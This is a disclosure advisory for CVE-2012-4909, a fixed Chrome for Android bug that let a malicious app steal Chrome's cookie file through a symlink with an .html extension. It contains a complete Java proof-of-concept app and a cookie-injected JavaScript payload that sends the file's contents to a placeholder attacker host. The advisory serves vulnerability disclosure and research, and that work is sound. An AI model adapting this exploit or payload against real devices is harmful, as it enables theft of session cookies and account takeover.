Chrome For Android Cookie Theft

`CVE Number: CVE-2012-4909  
Title: Chrome for Android - Cookie theft from Chrome by malicious Android app  
Affected Software: Confirmed on Chrome for Android v18.0.1025123  
Credit: Takeshi Terada  
Issue Status: v18.0.1025308 was released which fixes this vulnerability  
  
Overview:  
Symbolic links can be used for spoofing Content-Type of local files.  
It enables malicious Android apps to steal Chrome's Cookie file.  
  
Details:  
When a local URI (file:///) of symlink is given to Chrome for Android  
(v18.0.1025123), Chrome resolves symlink and load the content of the file  
that the symlink is pointing to.  
  
At the time of loading, Chrome does MIME sniffing by the extension of the  
symlink, rather than that of the actual file which symlink is pointing to.  
  
This behavior can be used for deluding Chrome into thinking that the Chrome's  
private file (Cookie file) is HTML. When Chrome renders the Cookie file as HTML,  
JavaScript in the Cookie file is executed.  
  
Whole steps to steal Chrome's Cookie file are described below:  
  
1. A malicious app create a symlink pointing to Chrome's Cookie file. The  
extension of the symlink should be "html", which is a simple trick for  
spoofing Content-Type.  
  
2. The malicious app forces Chrome to load attacker's Web page. The Web page  
sets a crafted Cookie which contains malicious HTML+JavaScript to steal  
the whole content of the Cookie file:  
  
Set-Cookie: x=<img><script>document.images[0].src='http://attacker/?'  
+encodeURIComponent(document.body.innerHTML)</script>;  
expires=Tue, 01-Jan-2030 00:00:00 GMT  
  
The Cookie is stored in the Cookie file of Chrome.  
  
3. The malicious app makes Chrome load the local URI of the symlink.  
Then Chrome follows the symlink and renders the Cookie file as HTML,  
because the extension of the URI (symlink) is "html".  
  
It results in the execution of the attacker's JavaScript code that is  
injected in the Cookie file. Attacker-supplied JavaScript read the whole  
content of the Cookie file and send it to the attacker's server.  
  
Proof of Concept:  
package jp.mbsd.terada.attackchrome1;  
  
import android.app.Activity;  
import android.os.Bundle;  
import android.util.Log;  
import android.content.Intent;  
import android.net.Uri;  
  
public class Main extends Activity {  
// TAG for logging.  
public final static String TAG = "attackchrome1";  
  
// Cookie file path of Chrome.  
public final static String CHROME_COOKIE_FILE_PATH =  
"/data/data/com.android.chrome/app_chrome/Default/Cookies";  
  
// Temporaly directory in which the symlink will be created.  
public final static String MY_TMP_DIR =  
"/data/data/jp.mbsd.terada.attackchrome1/tmp/";  
  
// The path of the Symlink (must have "html" extension)  
public final static String LINK_PATH = MY_TMP_DIR + "cookie.html";  
  
@Override  
public void onCreate(Bundle savedInstanceState) {  
super.onCreate(savedInstanceState);  
setContentView(R.layout.main);  
doit();  
}  
  
// Method to invoke Chrome.  
public void invokeChrome(String url) {  
Intent intent = new Intent("android.intent.action.VIEW");  
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");  
intent.setData(Uri.parse(url));  
startActivity(intent);  
}  
  
// Method to execute OS command.  
public void cmdexec(String[] cmd) {  
try {  
Runtime.getRuntime().exec(cmd);  
}  
catch (Exception e) {  
Log.e(TAG, e.getMessage());  
}  
}  
  
// Main method.  
public void doit() {  
try {  
// Create the symlink in this app's temporary directory.  
// The symlink points to Chrome's Cookie file.  
cmdexec(new String[] {"/system/bin/mkdir", MY_TMP_DIR});  
cmdexec(new String[] {"/system/bin/ln", "-s", CHROME_COOKIE_FILE_PATH, LINK_PATH});  
cmdexec(new String[] {"/system/bin/chmod", "-R", "777", MY_TMP_DIR});  
  
Thread.sleep(1000);  
  
// Force Chrome to load attacker's web page to poison Chrome's Cookie file.  
// Suppose the web page sets a Cookie as below.  
// x=<img><script>document.images[0].src='http://attacker/?'  
// +encodeURIComponent(document.body.innerHTML)</script>;  
// expires=Tue, 01-Jan-2030 00:00:00 GMT  
String url1 = "http://attacker/set_malicious_cookie.php";  
invokeChrome(url1);  
  
Thread.sleep(10000);  
  
// Force Chrome to load the symlink.  
// Chrome renders the content of the Cookie file as HTML.  
String url2 = "file://" + LINK_PATH;  
invokeChrome(url2);  
}  
catch (Exception e) {  
Log.e(TAG, e.getMessage());  
}  
}  
}  
  
Timeline:  
2012/08/06 Reported to Google security team  
2012/09/12 Vender announced v18.0.1025308  
2013/01/07 Disclosure of this advisory  
  
Recommendation:  
Upgrade to the latest version.  
  
Reference:  
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html  
https://code.google.com/p/chromium/issues/detail?id=141889  
`